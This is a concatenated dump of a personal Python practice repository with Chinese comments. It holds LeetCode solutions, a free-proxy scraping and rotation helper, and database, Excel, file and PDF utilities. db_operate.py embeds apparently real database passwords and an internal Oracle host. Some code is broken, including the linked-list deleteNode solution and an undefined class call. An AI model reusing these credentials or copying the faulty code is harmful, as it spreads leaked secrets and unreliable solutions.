9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /practice/leetcode/237.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 请编写一个函数,使其可以删除某个链表中给定的(非末尾)节点,你将只被给定要求被删除的节点。 7 | 现有一个链表 -- head = [4,5,1,9],它可以表示为: 8 | 4->5->1->9 9 | 10 | 示例 1: 11 | 输入: head = [4,5,1,9], node = 5 12 | 输出: [4,1,9] 13 | 解释: 给定你链表中值为 5 的第二个节点,那么在调用了你的函数之后,该链表应变为 4 -> 1 -> 9. 14 | 15 | 示例 2: 16 | 输入: head = [4,5,1,9], node = 1 17 | 输出: [4,5,9] 18 | 解释: 给定你链表中值为 1 的第三个节点,那么在调用了你的函数之后,该链表应变为 4 -> 5 -> 9. 19 | 20 | 说明: 21 | 链表至少包含两个节点。 22 | 链表中所有节点的值都是唯一的。 23 | 给定的节点为非末尾节点并且一定是链表中的一个有效节点。 24 | 不要从你的函数中返回任何结果。 25 | 26 | 注:直接把当前要删除的节点的下一个节点的值直接赋值给当前要删除的节点; 27 | 其实删除的是下一个节点,只是把下一个节点的值复制给了当前要删除的节点。 28 | -------------------------------- 29 | @Time : 2019/4/19 23:00 30 | @File : 237.py 31 | @Software: PyCharm 32 | -------------------------------- 33 | @Author : lixj 34 | @contact : lixj_zj@163.com 35 | """ 36 | 37 | 38 | class ListNode: 39 | def __init__(self, x): 40 | self.val = x 41 | self.next = None 42 | 43 | 44 | class Solution: 45 | def deleteNode(self, node): 46 | if node.next.next != None: 47 | node.val = node.next.val # 执行顺序:先处理值,再移动节点 48 | node.next = node.next.next 49 | node.val = node.next.val 50 | node.next = None 51 | # 同理可以删除前N个节点。for ()中从node节点处开始删除 52 | 53 | 54 | node = ListNode(5) 55 | print(Solution().deleteNode(node)) 56 | -------------------------------------------------------------------------------- /practice/leetcode/709.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 实现函数 ToLowerCase(),该函数接收一个字符串参数 str,并将该字符串中的大写字母转换成小写字母,之后返回新的字符串。 7 | 示例 1: 8 | 输入: "Hello" 9 | 输出: "hello" 10 | 示例 2: 11 | 输入: "here" 12 | 输出: "here" 13 | 示例 3: 14 | 输入: "LOVELY" 15 | 输出: "lovely" 16 | -------------------------------- 17 | @Time : 2019/4/17 23:06 18 | @File : 709.py 19 | @Software: PyCharm 20 | -------------------------------- 21 | @Author : lixj 22 | @contact : lixj_zj@163.com 23 | """ 24 | 25 | 26 | class SolutionOne: 27 | def toLowerCase(self, str: str) -> str: 28 | return str.lower() 29 | 30 | 31 | class SolutionTwo: 32 | def toLowerCase(self, str: str) -> str: 33 | result = [] 34 | for char in str: 35 | if 'A' <= char <= 'Z': # Unicode编码是大写字母 36 | result.append(chr(ord(char) + 32)) 37 | else: 38 | result.append(char) 39 | return "".join(result) 40 | 41 | 42 | string = "Hello WORD" 43 | # print(SolutionOne().toLowerCase(string)) 44 | print(SolutionTwo().toLowerCase(string)) 45 | -------------------------------------------------------------------------------- /practice/leetcode/771.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 给定字符串J 代表石头中宝石的类型,和字符串 S 代表你拥有的石头。S 中每个字符代表了一种你拥有的石头的类型, 7 | 你想知道你拥有的石头中有多少是宝石。 8 | J 中的字母不重复,J 和 S中的所有字符都是字母。字母区分大小写,因此"a"和"A"是不同类型的石头。 9 | 10 | 示例 1: 11 | 输入: J = "aA", S = "aAAbbbb" 12 | 输出: 3 13 | 14 | 示例 2: 15 | 输入: J = "z", S = "ZZ" 16 | 输出: 0 17 | 18 | 注意: 19 | S 和 J 最多含有50个字母。 20 | J 中的字符不重复。 21 | -------------------------------- 22 | @Time : 2019/4/15 22:05 23 | @File : 771.py 24 | @Software: PyCharm 25 | -------------------------------- 26 | @Author : lixj 27 | @contact : lixj_zj@163.com 28 | """ 29 | 30 | 31 | class SolutionOne: 32 | """ 33 | 两次for循环 34 | """ 35 | def numJewelsInStones(self, J: str, S: str) -> int: 36 | num = 0 37 | for j in J: 38 | for s in S: 39 | if j == s: 40 | num = num + 1 41 | return num 42 | 43 | 44 | class SolutionTwo: 45 | """ 46 | 一层for循环 + 判断 47 | """ 48 | def numJewelsInStones(self, J: str, S: str) -> int: 49 | num=0 50 | for s in S: 51 | if s in J: 52 | num+=1 53 | return num 54 | 55 | class SolutionThree: 56 | """ 57 | set() 58 | """ 59 | def numJewelsInStones(self, J: str, S: str) -> int: 60 | jSet = set(J) 61 | return sum(s in jSet for s in S) 62 | 63 | J = "aA" 64 | S = "aAAbbbb" 65 | print(SolutionTwo().numJewelsInStones(J, S)) 66 | -------------------------------------------------------------------------------- /practice/leetcode/832.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 给定一个二进制矩阵 A,我们想先水平翻转图像,然后反转图像并返回结果。 7 | 8 | 水平翻转图片就是将图片的每一行都进行翻转,即逆序。 9 | 例如,水平翻转 [1, 1, 0] 的结果是 [0, 1, 1]。 10 | 11 | 反转图片的意思是图片中的 0 全部被 1 替换, 1 全部被 0 替换。例如,反转 [0, 1, 1] 的结果是 [1, 0, 0]。 12 | 13 | 示例 1: 14 | 输入: [[1,1,0],[1,0,1],[0,0,0]] 15 | 输出: [[1,0,0],[0,1,0],[1,1,1]] 16 | 解释: 17 | 首先翻转每一行: [[0,1,1],[1,0,1],[0,0,0]]; 18 | 然后反转图片: [[1,0,0],[0,1,0],[1,1,1]] 19 | 20 | 示例 2: 21 | 输入: [[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]] 22 | 输出: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]] 23 | 解释: 24 | 首先翻转每一行: [[0,0,1,1],[1,0,0,1],[1,1,1,0],[0,1,0,1]]; 25 | 然后反转图片: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]] 26 | 27 | 说明: 28 | 1 <= A.length = A[0].length <= 20 29 | 0 <= A[i][j] <= 1 30 | -------------------------------- 31 | @Time : 2019/4/20 14:33 32 | @File : 832.py 33 | @Software: PyCharm 34 | -------------------------------- 35 | @Author : lixj 36 | @contact : lixj_zj@163.com 37 | """ 38 | 39 | 40 | class Solution: 41 | def flipAndInvertImageOne(self, A): 42 | """ 43 | enumerate()遍历 44 | :param A: 45 | :return: 46 | """ 47 | result = [] 48 | for list in A: 49 | list = list[::-1] 50 | for key, value in enumerate(list): 51 | # 52 | if value == 0: 53 | list[key] = 1 54 | else: 55 | list[key] = 0 56 | # 或者 list[key] = 1 - list[key] 代替if-else判断 57 | result.append(list) 58 | return result 59 | 60 | def flipAndInvertImageTwo(self, A): 61 | """ 62 | ^ 异或运算:相同为1,相异为0 63 | :param A: 64 | :return: 65 | """ 66 | return [[j ^ 1 for j in i[::-1]] for i in A] 67 | # 或者 j ^ 1 替换成 1 - j 68 | 69 | def flipAndInvertImageThree(self, A): 70 | """ 71 | 头尾数据取反并调换位置 72 | i[end], i[start] = 1 - i[start], 1 - i[end] 73 | :param A: 74 | :return: 75 | """ 76 | for i in A: 77 | start = 0 78 | end = len(i) - 1 79 | while start <= end: 80 | i[end], i[start] = 1 - i[start], 1 - i[end] # !头尾数据取反并调换位置 81 | # 或者 i[end], i[start] = 1 ^ i[start], 1 ^ i[end] 82 | start = start + 1 83 | end = end - 1 84 | return A 85 | 86 | 87 | A = [[1, 1, 0], [1, 0, 1], [0, 0, 0]] 88 | # print(Solution().flipAndInvertImageOne(A)) 89 | # print(Solution().flipAndInvertImageTwo(A)) 90 | print(Solution().flipAndInvertImageThree(A)) 91 | -------------------------------------------------------------------------------- /practice/leetcode/977.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 给定一个按非递减顺序排序的整数数组 A,返回每个数字的平方组成的新数组,要求也按非递减顺序排序。 7 | 8 | 示例 1: 9 | 输入:[-4,-1,0,3,10] 10 | 输出:[0,1,9,16,100] 11 | 12 | 示例 2: 13 | 输入:[-7,-3,2,3,11] 14 | 输出:[4,9,9,49,121] 15 | 16 | 提示: 17 | 1 <= A.length <= 10000 18 | -10000 <= A[i] <= 10000 19 | A 已按非递减顺序排序。 20 | -------------------------------- 21 | @Time : 2019/4/19 23:14 22 | @File : 977.py 23 | @Software: PyCharm 24 | -------------------------------- 25 | @Author : lixj 26 | @contact : lixj_zj@163.com 27 | """ 28 | 29 | 30 | class Solution: 31 | def sortedSquaresOne(self, A): 32 | """ 33 | sorted() 34 | 时间复杂度:O(N logN),其中 N 是数组 A 的长度。 35 | 空间复杂度:O(N)。 36 | :param A: 37 | :return: 38 | """ 39 | return sorted(i ** 2 for i in A) # sorted()与list.sort()的区别 40 | 41 | def sortedSquaresTwo(self, A): 42 | """ 43 | 左右双指针,从中间分界位置往两边移动 44 | 时间复杂度:O(N),其中 N 是数组 A 的长度。 45 | 空间复杂度:O(N)。 46 | :param A: 47 | :return: 48 | """ 49 | length = len(A) 50 | right = 0 # 正向读取非负数部分 51 | # 找到正负数的分界位置 52 | while right < length and A[right] < 0: 53 | right += 1 54 | left = right - 1 # 反向读取负数部分 55 | result = [] 56 | 57 | # 当左右指针均有指向时 58 | while left >= 0 and right < length: # left >= 0 right < length 59 | # 比较指针对应位置元素平方的大小,result中添加较小的值,并将对应的左右指针往头尾移动 60 | if A[left] ** 2 > A[right] ** 2: 61 | result.append(A[right] ** 2) 62 | right += 1 63 | else: 64 | result.append(A[left] ** 2) 65 | left -= 1 66 | # 其中一个指针移动到端点时,另一个指针仍指向数据,则在result中添加余下的数据,同时移动指针 67 | while left >= 0: 68 | result.append(A[left] ** 2) 69 | left -= 1 70 | while right < length: 71 | result.append(A[right] ** 2) 72 | right += 1 73 | return result 74 | 75 | def sortedSquaresThree(self, A): 76 | """ 77 | 左右双指针,从两边位置往中间移动 78 | :param A: 79 | :return: 80 | """ 81 | left = 0 82 | right = len(A) - 1 83 | nowIndex = len(A) - 1 84 | result = [0] * len(A) # 构建元素为0,个数为len(A)的列表,后续判断中替换元素 85 | while left <= right: 86 | if A[left] ** 2 < A[right] ** 2: 87 | result[nowIndex] = A[right] ** 2 # 替换对应位置的元素 88 | nowIndex -= 1 # 当前索引自减 89 | right -= 1 # 右指针往中间移动 90 | else: 91 | result[nowIndex] = A[left] ** 2 92 | nowIndex -= 1 93 | left += 1 # 左指针往中间移动 94 | return result 95 | 96 | 97 | list = [-4, -1, 0, 3, 10] 98 | # print(Solution().sortedSquaresOne(list)) 99 | # print(Solution().sortedSquaresTwo(list)) 100 | print(Solution().sortedSquaresThree(list)) 101 | -------------------------------------------------------------------------------- /practice/technique/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/5/25 10:32 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /practice/technique/config/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/30 9:05 8 | @File : __init__.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /practice/technique/config/random_ip.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 获取随机可以用IP 6 | -------------------------------- 7 | @Time : 19-2-28 上午11:28 8 | @File : random_ip.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | from bs4 import BeautifulSoup as bs 17 | import user_agent 18 | import logging 19 | import os 20 | import random 21 | import traceback 22 | import time 23 | 24 | # logging.basicConfig函数对日志的输出格式及方式做相关配置 25 | logging.basicConfig(level=logging.DEBUG, 26 | format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s') 27 | 28 | 29 | class RandomIp(): 30 | def __init__(self): 31 | self.XICI_URL = "https://www.xicidaili.com/nn/" 32 | self.TEST_URL = "https://www.baidu.com/" 33 | self.IP_POOL_FILE = "ip_pool.txt" 34 | self.MAX_PAGE_OF_XICI = 3614 # 西刺网站总页数 35 | self.NUM_OF_PAGES = 300 # 爬取的目标页数 36 | # 获取随机的headers 37 | self.headers = user_agent.UserAgent().get_headers() # userAgent.UserAgent() 类实例化()括号就相当于self参数 38 | 39 | def get_target_pages(self, page): 40 | """ 41 | 获取随机的NUM_OF_PAGES页 42 | :param page: 43 | :return: 44 | """ 45 | return random.sample(range(1, page), self.NUM_OF_PAGES) 46 | 47 | def request_get(self, url): 48 | """ 49 | requests请求 50 | :param url: 51 | :return: 52 | """ 53 | return requests.get(url, headers=self.headers, timeout=10) 54 | 55 | def analysis_page(self, req): 56 | result_ip_pool = [] 57 | soup = bs(req.text, "lxml") 58 | ips = soup.find_all("tr") 59 | # 遍历当页的每条记录 60 | for i in range(1, len(ips)): 61 | try: 62 | ip = ips[i] 63 | tds = ip.find_all("td") 64 | temp_ip = str(tds[5].contents[0]).lower() + '://' + tds[1].contents[0] + ':' + tds[2].contents[0] 65 | speed = float(tds[6].div.get("title")[:-1]) 66 | connect_time = float(tds[7].div.get("title")[:-1]) 67 | # 68 | if speed < 0.5 and connect_time < 0.5: 69 | result_ip_pool.append(temp_ip) 70 | except Exception as e: 71 | logging.error("解析IP参数异常!") 72 | traceback.format_exc(e) 73 | return result_ip_pool 74 | 75 | def get_ip_pool(self): 76 | """ 77 | 获取IP池 78 | :return: 79 | """ 80 | result_ip_pool = [] 81 | max_page = self.MAX_PAGE_OF_XICI 82 | # 获取随机的NUM_OF_PAGES页 83 | target_pages = RandomIp().get_target_pages(max_page) 84 | for one_page in target_pages: 85 | one_page_url = self.XICI_URL + str(one_page) 86 | req = RandomIp().request_get(one_page_url) 87 | if (req.status_code == 200): 88 | result_ip_pool.extend(RandomIp().analysis_page(req)) 89 | else: 90 | logging.error("连接异常!异常url:", one_page_url) 91 | return result_ip_pool 92 | 93 | def review_ip_pool(self): 94 | """ 95 | 重新验证IP池 96 | :return: ip_pool 97 | """ 98 | ip_pool_path = self.IP_POOL_FILE 99 | try: 100 | with open(ip_pool_path, "r", encoding="utf-8") as f: 101 | content = f.read() 102 | ip_pool = content[2:len(content) - 2].split("', '") 103 | reduce_num = 0 104 | logging.info("IP池中待验证个数:{}".format(len(ip_pool))) 105 | for ip in ip_pool[:]: 106 | proxy = {ip.split("://")[0]: ip.split("://")[1]} 107 | try: 108 | req = requests.get(self.TEST_URL, proxies=proxy, headers=self.headers, timeout=3) 109 | if req.status_code != 200: 110 | ip_pool.remove(ip) 111 | reduce_num += 1 112 | time.sleep(1) 113 | except Exception as e: 114 | logging.error("ip异常:{},异常信息:{}".format(ip, str(e))) 115 | ip_pool.remove(ip) 116 | reduce_num += 1 117 | continue 118 | logging.info("IP池中已验证个数:{},减少个数:{}个".format(len(ip_pool), reduce_num)) 119 | with open(ip_pool_path, "w", encoding="utf-8") as f: 120 | f.write(str(ip_pool)) 121 | logging.info("IP池已更新!") 122 | except Exception as e: 123 | logging.error("重新验证IP池异常!异常信息:{}".format(e)) 124 | 125 | def write_ip_to_file(self): 126 | """ 127 | IP写入文件,追加形式 128 | :return: 129 | """ 130 | try: 131 | module_path = os.path.dirname(__file__) 132 | file_name = module_path + '\\' + self.IP_POOL_FILE 133 | with open(file_name, "a+", encoding="utf-8") as f: 134 | f.write(str(self.get_ip_pool())) 135 | logging.info("写入IP {} 个结束!".format(len(self.get_ip_pool()))) 136 | except Exception as e: 137 | logging.error("IP写入文件异常!异常信息:", e) 138 | traceback.format_exc(e) 139 | 140 | def get_one_ip(self): 141 | """ 142 | 获取随机的一个IP地址 143 | :return: 144 | """ 145 | try: 146 | module_path = os.path.dirname(__file__) 147 | file_name = module_path + '\\' + self.IP_POOL_FILE 148 | with open(file_name, "r", encoding="utf-8") as f: 149 | content = f.read() 150 | ip_list = content[1:len(content) - 1].split(", ") 151 | random_ip = random.choice(ip_list) # choice()获取一个 152 | logging.info("random_ip: %s", random_ip) 153 | return random_ip 154 | except Exception as e: 155 | logging.error("IP读入文件异常!异常信息:", e) 156 | traceback.format_exc(e) 157 | 158 | def get_one_proxies(self): 159 | """ 160 | 获取随机的一个Proxies 161 | :return: 162 | """ 163 | try: 164 | module_path = os.path.dirname(__file__) 165 | file_name = module_path + '\\' + self.IP_POOL_FILE 166 | with open(file_name, "r", encoding="utf-8") as f: 167 | content = f.read() 168 | ip_list = content[2:len(content) - 2].split("', '") 169 | random_ip = random.choice(ip_list) # choice()获取一个 170 | proxies = {"http": random_ip} 171 | logging.info("proxies: %s", str(proxies)) 172 | return proxies 173 | except Exception as e: 174 | logging.error("IP读入文件异常!异常信息:", e) 175 | traceback.format_exc(e) 176 | 177 | def get_num_of_ip(self, num_of_ip): 178 | """ 179 | 获取指定数量的IP 180 | :return: 181 | """ 182 | try: 183 | module_path = os.path.dirname(__file__) 184 | file_name = module_path + '\\' + self.IP_POOL_FILE 185 | with open(file_name, "r", encoding="utf-8") as f: 186 | content = f.read() 187 | cont_list = content.split("', '") 188 | ip_list = cont_list[1:len(cont_list) - 1] 189 | random_ip_list = random.sample(ip_list, num_of_ip) # sample()获取多个 190 | logging.info("random_ip_list: %s", random_ip_list) 191 | return random_ip_list 192 | except Exception as e: 193 | logging.error("IP读入文件异常!异常信息:", e) 194 | traceback.format_exc(e) 195 | 196 | 197 | if __name__ == '__main__': 198 | RandomIp().write_ip_to_file() 199 | RandomIp().review_ip_pool() 200 | 201 | 202 | -------------------------------------------------------------------------------- /practice/technique/config/test_comfig.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 17:49 8 | @File : test_comfig.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import random_ip 16 | import user_agent 17 | 18 | # 文件中写入IP 19 | random_ip.RandomIp().write_ip_to_file() 20 | 21 | # 重新验证IP 22 | random_ip.RandomIp().review_ip_pool() 23 | 24 | # 获取随机一个IP 25 | random_ip.RandomIp().get_one_ip() 26 | 27 | # 获取随机一个prop 28 | random_ip.RandomIp().get_one_proxies() 29 | 30 | # 获取随机的多个IP 31 | random_ip.RandomIp().get_num_of_ip(5) 32 | 33 | # 获取随机userAgent 34 | user_agent.UserAgent().get_user_agent() 35 | 36 | # 获取随机headers 37 | user_agent.UserAgent().get_headers() 38 | -------------------------------------------------------------------------------- /practice/technique/db_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 数据库相关操作 6 | 1. 操作 MySQL 7 | 2. 操作 Oracle 8 | 3. 操作 MongoDB 9 | 4. 导出 MySQL 数据至 excel 10 | 5. 导出 Oracle 数据至 excel 11 | -------------------------------- 12 | @Time : 2019/6/7 15:45 13 | @File : db_operate.py 14 | @Software: PyCharm 15 | -------------------------------- 16 | @Author : lixj 17 | @contact : lixj_zj@163.com 18 | """ 19 | 20 | 21 | import re 22 | import json 23 | import cx_Oracle 24 | import xlrd 25 | from pathlib import Path 26 | import pymysql 27 | import time 28 | 29 | 30 | def create_mysql_connect(): 31 | conn = pymysql.connect( 32 | host='localhost', 33 | user='root', 34 | passwd='123456789', 35 | db='page_log', 36 | port=3306, 37 | charset='utf8' 38 | ) 39 | # 获得游标 40 | cur = conn.cursor() 41 | conn.autocommit(1) 42 | return cur, conn 43 | 44 | def close_connect(conn): 45 | conn.commit() 46 | conn.close() 47 | 48 | 49 | 50 | class Mysql(): 51 | pass 52 | 53 | class Oracle(): 54 | pass 55 | 56 | class Mongodb(): 57 | pass 58 | 59 | 60 | class Trans(): 61 | def __init__(self): 62 | self.jsonPath = "json2mongo.json" 63 | self.mysqlPath = "csv2mysql.csv" 64 | self.oraclePath = "csv2oracle.csv" 65 | self.oracle_localhost = cx_Oracle.connect('app_common_service/Tebon@20180522@192.168.2.49:1521/orcl') # 链接信息:localhost:1521/orcl,在数据库中右键属性,查看链接详细信息 66 | 67 | def csv2oracle(self): 68 | print("connect to oracle...") 69 | try: 70 | # 1. 链接Oracle数据库 71 | conn = self.oracle_localhost 72 | cursor = conn.cursor() 73 | 74 | # 2. 查询数据 75 | sql = "select * from KCB_INFO_AND_LISTED_INFO where row_count =1" 76 | cursor.execute(sql) 77 | allData = cursor.fetchall() # cursor.fetchone() 78 | for data in allData: 79 | print(data) 80 | 81 | # # 3. 插入、更新、删除 主要区别在于sql不同 82 | # def sqlDML(sql, conn): 83 | # cursor = conn.cursor() 84 | # cursor.execute(sql) 85 | # cursor.close() 86 | # conn.commit() 87 | 88 | conn.commit() 89 | cursor.close() 90 | conn.close() 91 | except: 92 | conn.rollback() 93 | 94 | trans = trans() 95 | # trans.json2mongodb() 96 | # trans.csv2mysql() 97 | trans.csv2oracle() 98 | 99 | 100 | -------------------------------------------------------------------------------- /practice/technique/excel_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : excel 相关操作 6 | 1. 数据处理 7 | -------------------------------- 8 | @Time : 2019/8/3 12:07 9 | @File : excel_operate.py 10 | @Software: PyCharm 11 | -------------------------------- 12 | @Author : lixj 13 | @contact : lixj_zj@163.com 14 | """ 15 | 16 | import pandas as pd 17 | import xlrd 18 | 19 | # 转换某一列为字符串 20 | # df = pd.DataFrame(pd.read_excel('train_data.xlsx', converters={'visitor_id': str})) 21 | # 转换所有列为字符串 22 | df = pd.DataFrame(pd.read_excel('test_data/test_excel.xlsx', dtype=str)) 23 | 24 | # 数据预处理 25 | # 1. 填补 visitor_id 为空的缺省值(非空字符串),以特定值填充某一列的空值 26 | df["visitor_id"] = df["visitor_id"].fillna(0) 27 | 28 | # 2. 删除某列包含特殊值的行 29 | df = df[~ df['证券名称'].str.contains('联通')] 30 | 31 | 32 | 33 | # 常用操作 34 | # 1. 删除行(根据行索引) 35 | df = df.drop("row_id") 36 | # 删除行(根据行号) 37 | df = df.drop(df.index[6]) 38 | # 删除特定数值的行 39 | df = df[df['成交金额'] > 10000] 40 | # 删除某列包含特殊字符的行 41 | df = df[~ df['证券名称'].str.contains('联通')] 42 | 43 | 44 | # 2. 删除列 45 | df = df.drop(['id'], axis=1) 46 | # 删除多列(列集合) 47 | df = df.drop(columns=['B', 'C']) 48 | 49 | 50 | 51 | 52 | # # 数据统计 53 | # # 读取前五条数据 54 | # df.head() 55 | # # 读取某列 56 | # created_time = df['created_time'] 57 | # for one_time in created_time: 58 | # date = one_time.split(" ")[0] 59 | # time = one_time.split(" ")[1] 60 | # print(date, time) 61 | -------------------------------------------------------------------------------- /practice/technique/file_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 文件相关常用操作 6 | 1. 获取指定目录及其子目录下,所有指定后缀的文件的绝对路径 7 | 2. 遍历指定目录下(不包含子目录)所有文件,更新指定后缀 8 | 3. 判断指定文件是否是指定后缀的文件 9 | 4. 获取当前文件路径 10 | 5. 获取目录层级 11 | 6. 组合文件路径 12 | 7. 流式分块读取大文件 13 | 14 | 注:os 模块;path 模块;pathlib 库(重点); 15 | -------------------------------- 16 | @Time : 2019/5/25 22:28 17 | @File : file_operate.py 18 | @Software: PyCharm 19 | -------------------------------- 20 | @Author : lixj 21 | @contact : lixj_zj@163.com 22 | """ 23 | 24 | import os 25 | from pathlib import Path 26 | import pathlib 27 | import os.path 28 | from functools import partial 29 | 30 | 31 | def get_suffix_file_path(dir_path, suffix): 32 | """ 33 | 获取指定目录及其子目录下,所有指定后缀的文件的绝对路径 34 | :param dir_path: 指定目录 eg. "D:\\ZX\\temp" 35 | :param suffix: 指定后缀 eg. "txt" 36 | :return: 37 | """ 38 | file_list = [] 39 | for root, dirs, files in os.walk(dir_path): 40 | for file in files: 41 | if str(file).endswith(suffix): 42 | file_list.append(os.path.join(root, file)) 43 | return file_list 44 | 45 | 46 | def rename_file_suffix(dir_path, old_suffix, new_suffix): 47 | """ 48 | 遍历指定目录下(不包含子目录)所有文件,更新指定后缀 49 | :param dir_path: 指定路径 eg. "F:\\temp" 50 | :param old_suffix: 待修改后缀 eg. "txt" 51 | :param new_suffix: 新后缀 eg. "jpg" 52 | :return: 53 | """ 54 | for file_path in Path(dir_path).glob('*.' + old_suffix): 55 | file_path.rename(file_path.with_suffix("." + new_suffix)) 56 | 57 | 58 | def is_suffix_file(file, suffix): 59 | """ 60 | 判断指定文件是否是指定后缀的文件 61 | :param file: 指定文件 eg. "F:\\temp\\img.txt" or "demo.txt" 62 | :param suffix: 指定后缀 eg. "txt" 63 | :return: True or False 64 | """ 65 | return pathlib.PurePath(file).match('*.' + suffix) 66 | 67 | 68 | def get_current_working_directory(): 69 | """ 70 | 获取当前文件路径 71 | :return: 72 | """ 73 | print(os.path.dirname(__file__)) 74 | print(os.getcwd()) 75 | print(pathlib.Path.cwd()) 76 | 77 | 78 | def get_upper_two_levels(): 79 | """ 80 | 获取目录层级 -- 获取上上层目录 81 | :return: 82 | """ 83 | print(os.path.dirname(os.path.dirname(os.getcwd()))) 84 | print(pathlib.Path.cwd().parent.parent) 85 | 86 | 87 | def combined_path(): 88 | """ 89 | 获取目录层级 -- 在上上层目录下拼接路径 90 | :return: 拼接结果 91 | """ 92 | # os 模块 93 | print(os.path.join(os.path.dirname(os.path.dirname(os.getcwd())), "1", "2", "3")) 94 | 95 | # Path 模块 96 | parts = ["1", "2", "3"] 97 | print(pathlib.Path.cwd().parent.parent.joinpath(*parts)) 98 | 99 | 100 | def get_file_path(): 101 | """ 102 | 组合文件路径 103 | :return: 104 | """ 105 | # 旧方法 106 | print(os.path.join('/temp', 'foo.txt')) 107 | # output: '/temp/foo.txt' 108 | 109 | # 新方法 110 | print(Path('/temp') / 'foo.txt') 111 | 112 | 113 | def read_file(file_name): 114 | """ 115 | 快速读取文件 116 | :param file_name: 文件名 117 | :return: 118 | """ 119 | # 标准做法 120 | with open(file_name) as f: 121 | f.read() 122 | 123 | # pathlib 模块,封装了 with open() 方法 124 | Path(file_name).read_text() 125 | 126 | 127 | def read_big_file_by_line(): 128 | """ 129 | 流式逐行读取大文件(常规做法) 130 | :return: 131 | """ 132 | # with 上下文管理器会自动关闭打开的文件描述符 133 | # 在迭代文件对象时,内容是一行一行返回的,不会占用太多内存 134 | # 缺点:大文本只有一行,所有内容读入内存 135 | with open("foo.txt") as f: 136 | for line in f: 137 | print(line) 138 | 139 | 140 | def read_big_file_by_chunk(file_path): 141 | """ 142 | 流式分块读取大文件 143 | :param file_path: 文件路径 144 | :return: 145 | """ 146 | # 普通做法 147 | with open(file_path) as file: 148 | for chunk in chunked_file_reader(file): 149 | yield chunk 150 | 151 | # 优秀做法 152 | with open(file_path) as file: 153 | for chunk in chunked_file_reader_mod(file): 154 | yield chunk 155 | 156 | 157 | def chunked_file_reader(file, block_size=1024 * 8): 158 | """ 159 | 流式分块读取大文件(普通做法) 160 | :param file: 文件名,即 with open(file_name) as file: 161 | :param block_size: 分块大小 162 | :return: 163 | """ 164 | while True: 165 | chunk = file.read(block_size) 166 | if not chunk: 167 | break 168 | yield chunk 169 | 170 | 171 | def chunked_file_reader_mod(file, block_size=1024 * 8): 172 | """ 173 | 流式分块读取大文件(优秀做法) 174 | :param file: 文件名,with open(file_name) as file: 175 | :param block_size: 分块大小 176 | :return: 177 | """ 178 | # 首先使用 partial(fp.read, block_size) 构造一个新的无需参数的偏函数 179 | # 循环将不断返回 fp.read(block_size) 调用结果,直到其为 '' 时终止 180 | for chunk in iter(partial(file.read, block_size), ''): 181 | yield chunk 182 | -------------------------------------------------------------------------------- /practice/technique/pdf_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : pdf相关的操作 6 | -------------------------------- 7 | @Time : 2019/5/25 10:39 8 | @File : pdf_operate.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | from PyPDF2 import PdfFileWriter, PdfFileReader 16 | import os 17 | import comDocOperate 18 | 19 | 20 | class PdfOperate(): 21 | def __init__(self): 22 | pass 23 | 24 | def get_limit_page_pdf(self, pdf_path, start_page, end_page): 25 | """ 26 | 截取pdf中的几页,输出到同目录 27 | :param pdf_path: 28 | :param start_page: 29 | :param end_page: 30 | :return: 31 | """ 32 | output = PdfFileWriter() 33 | pdf_file = PdfFileReader(open(pdf_path, "rb")) 34 | 35 | # 保存input.pdf中的start_page-end_page页到output.pdf 36 | for i in range(start_page, end_page): 37 | output.addPage(pdf_file.getPage(i)) 38 | 39 | output_stream = 